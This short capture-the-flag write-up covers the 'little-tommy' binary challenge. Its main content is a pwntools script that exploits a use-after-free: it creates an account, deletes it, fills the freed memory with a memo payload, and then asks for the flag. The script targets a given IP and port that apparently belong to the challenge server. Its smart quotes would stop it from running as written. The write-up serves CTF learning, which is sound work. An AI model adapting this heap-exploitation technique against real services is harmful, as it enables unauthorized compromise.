Download Ghidra for “little-tommy” binary file and open it.
or you can just use these script after download the zip file
step1: download little-tommy.zip extract it on the desktop folder.
Step2: Run below python script in terminal
#!/usr/bin/python3 #coding: utf-8
from pwn import * from time import sleep import sys
host = str(sys.argv[1]) # recebe o host via argumento, na linha de comando port = int(sys.argv[2]) # recebe a porta via argumento, na linha de comando
arch = ‘i386’
context.log_level = ‘critical’
create_account = ‘1’ first_name = ‘test’ last_name = ‘test’ delete_account = ‘3’ # Aqui chamamos a função free(). memo = ‘4’ add_memo = ‘AAAABBBBCCCCDDDDEEEEFFFFGGGGHHHHIIIIJJJJKKKKLLLLMMMMNNNNOOOOPPPPfuck’ # payload cat_flag = ‘5’
p = remote(host, port) #p = process(“./little_tommy”) p.recvline(“Please enter an operation number:”) sleep(0.5) p.sendline(create_account) sleep(0.5) p.recvline(“First name:”) p.sendline(first_name) sleep(0.5) p.recvline(“First name:”) p.sendline(last_name) sleep(0.5) p.recvline(“Please enter an operation number:”) p.sendline(delete_account) p.recvline(“Account deleted successfully”) sleep(0.5) p.recvline(“Please enter an operation number:”) p.sendline(memo) sleep(0.5) p.recvline(“Please enter memo:”) p.sendline(add_memo) p.recvline(“Thank you, please keep this reference number number safe:”) sleep(0.5) p.recvline(“Please enter an operation number:”) p.sendline(cat_flag)
p.interactive()
Step3 : $pyhton3 filename.py<space> 206.189.121.131 <space> 31020
Step4 : Enter 5 you will see the flag
Comments